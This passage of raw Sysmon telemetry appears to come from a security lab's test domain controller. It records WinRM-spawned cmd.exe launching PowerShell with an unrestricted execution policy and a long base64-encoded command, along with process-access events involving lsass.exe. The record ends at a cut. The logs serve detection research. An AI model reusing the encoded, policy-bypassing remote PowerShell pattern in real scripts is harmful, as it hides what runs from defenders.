10:39:14.218{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000065Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.218{733EE690-3C5B-5F80-0500-000000007E01}640764C:\Windows\system32\csrss.exe{733EE690-3DD2-5F80-F102-000000007E01}4780C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x800000000000000064Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.218{733EE690-3DD2-5F80-EF02-000000007E01}48923660C:\Windows\system32\WinrsHost.exe{733EE690-3DD2-5F80-F102-000000007E01}4780C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+7d09|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb 154100x800000000000000063Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.211{733EE690-3DD2-5F80-F102-000000007E01}4780C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{733EE690-3DD2-5F80-EE26-110000000000}0x1126ee0HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{733EE690-3DD2-5F80-EF02-000000007E01}4892C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x800000000000000062Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.202{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000061Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.202{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000060Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.202{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000059Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.202{733EE690-3C69-5F80-1400-000000007E01}13321612C:\Windows\system32\svchost.exe{733EE690-3DD2-5F80-EF02-000000007E01}4892C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x800000000000000058Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.186{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD2-5F80-EF02-000000007E01}4892C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000057Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.171{733EE690-3DD2-5F80-F002-000000007E01}47364856C:\Windows\system32\conhost.exe{733EE690-3DD2-5F80-EF02-000000007E01}4892C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000056Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.171{733EE690-3C5B-5F80-0500-000000007E01}640764C:\Windows\system32\csrss.exe{733EE690-3DD2-5F80-F002-000000007E01}4736C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x800000000000000055Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.171{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000054Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.171{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000053Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.171{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000052Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.171{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000051Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.171{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000050Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.171{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000049Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.171{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000048Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.171{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000047Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.171{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000046Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.171{733EE690-3C5B-5F80-0500-000000007E01}6401216C:\Windows\system32\csrss.exe{733EE690-3DD2-5F80-EF02-000000007E01}4892C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x800000000000000045Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.171{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD2-5F80-EF02-000000007E01}4892C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x800000000000000044Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.171{733EE690-3DD2-5F80-EF02-000000007E01}4892C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote 